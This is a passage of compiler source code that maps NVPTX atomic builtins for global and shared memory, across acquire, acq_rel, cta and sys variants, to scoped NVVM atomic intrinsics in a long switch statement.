return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_inc_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_inc_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_dec_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_dec_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_and_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_and_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_or_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_or_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xor_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_xor_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cas_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cas_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acq_rel);
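// Acquire-release global-space atomics with an explicit _cta / _sys scope.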
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_f:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_f:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acq_rel_sys);
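// Atomics on the shared address space, again walking the same
// operation/ordering/scope matrix, starting with the relaxed,
// default-scope forms.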
case NVPTX::BI__nvvm_atom_add_shared_i:
case NVPTX::BI__nvvm_atom_add_shared_l:
case NVPTX::BI__nvvm_atom_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i);
case NVPTX::BI__nvvm_atom_add_shared_f:
case NVPTX::BI__nvvm_atom_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f);
case NVPTX::BI__nvvm_atom_xchg_shared_i:
case NVPTX::BI__nvvm_atom_xchg_shared_l:
case NVPTX::BI__nvvm_atom_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i);
case NVPTX::BI__nvvm_atom_max_shared_i:
case NVPTX::BI__nvvm_atom_max_shared_l:
case NVPTX::BI__nvvm_atom_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i);
case NVPTX::BI__nvvm_atom_max_shared_ui:
case NVPTX::BI__nvvm_atom_max_shared_ul:
case NVPTX::BI__nvvm_atom_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui);
case NVPTX::BI__nvvm_atom_min_shared_i:
case NVPTX::BI__nvvm_atom_min_shared_l:
case NVPTX::BI__nvvm_atom_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i);
case NVPTX::BI__nvvm_atom_min_shared_ui:
case NVPTX::BI__nvvm_atom_min_shared_ul:
case NVPTX::BI__nvvm_atom_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui);
case NVPTX::BI__nvvm_atom_inc_shared_ui:
case NVPTX::BI__nvvm_atom_inc_shared_ul:
case NVPTX::BI__nvvm_atom_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i);
case NVPTX::BI__nvvm_atom_dec_shared_ui:
case NVPTX::BI__nvvm_atom_dec_shared_ul:
case NVPTX::BI__nvvm_atom_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i);
case NVPTX::BI__nvvm_atom_and_shared_i:
case NVPTX::BI__nvvm_atom_and_shared_l:
case NVPTX::BI__nvvm_atom_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i);
case NVPTX::BI__nvvm_atom_or_shared_i:
case NVPTX::BI__nvvm_atom_or_shared_l:
case NVPTX::BI__nvvm_atom_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i);
case NVPTX::BI__nvvm_atom_xor_shared_i:
case NVPTX::BI__nvvm_atom_xor_shared_l:
case NVPTX::BI__nvvm_atom_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i);
case NVPTX::BI__nvvm_atom_cas_shared_i:
case NVPTX::BI__nvvm_atom_cas_shared_l:
case NVPTX::BI__nvvm_atom_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i);
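// Relaxed shared-space atomics with an explicit _cta / _sys scope.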
case NVPTX::BI__nvvm_atom_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_cta);
case NVPTX::BI__nvvm_atom_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_sys);
case NVPTX::BI__nvvm_atom_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_cta);
case NVPTX::BI__nvvm_atom_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_cta);
case NVPTX::BI__nvvm_atom_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_sys);
case NVPTX::BI__nvvm_atom_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_sys);
case NVPTX::BI__nvvm_atom_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_cta);
case NVPTX::BI__nvvm_atom_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_cta);
case NVPTX::BI__nvvm_atom_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_sys);
case NVPTX::BI__nvvm_atom_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_sys);
case NVPTX::BI__nvvm_atom_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_cta);
case NVPTX::BI__nvvm_atom_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_sys);
case NVPTX::BI__nvvm_atom_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_sys);
case NVPTX::BI__nvvm_atom_acquire_add_shared_i:
case NVPTX::BI__nvvm_atom_acquire_add_shared_l:
case NVPTX::BI__nvvm_atom_acquire_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_add_shared_f:
case NVPTX::BI__nvvm_atom_acquire_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acquire);
case NVPTX::BI__nvvm_atom_acquire_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acquire_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acquire_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_shared_i:
case NVPTX::BI__nvvm_atom_acquire_max_shared_l:
case NVPTX::BI__nvvm_atom_acquire_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_max_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_shared_i:
case NVPTX::BI__nvvm_atom_acquire_min_shared_l:
case NVPTX::BI__nvvm_atom_acquire_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_min_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_and_shared_i:
case NVPTX::BI__nvvm_atom_acquire_and_shared_l:
case NVPTX::BI__nvvm_atom_acquire_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_or_shared_i:
case NVPTX::BI__nvvm_atom_acquire_or_shared_l:
case NVPTX::BI__nvvm_atom_acquire_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_xor_shared_i:
case NVPTX::BI__nvvm_atom_acquire_xor_shared_l:
case NVPTX::BI__nvvm_atom_acquire_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cas_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cas_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_shared_ll:
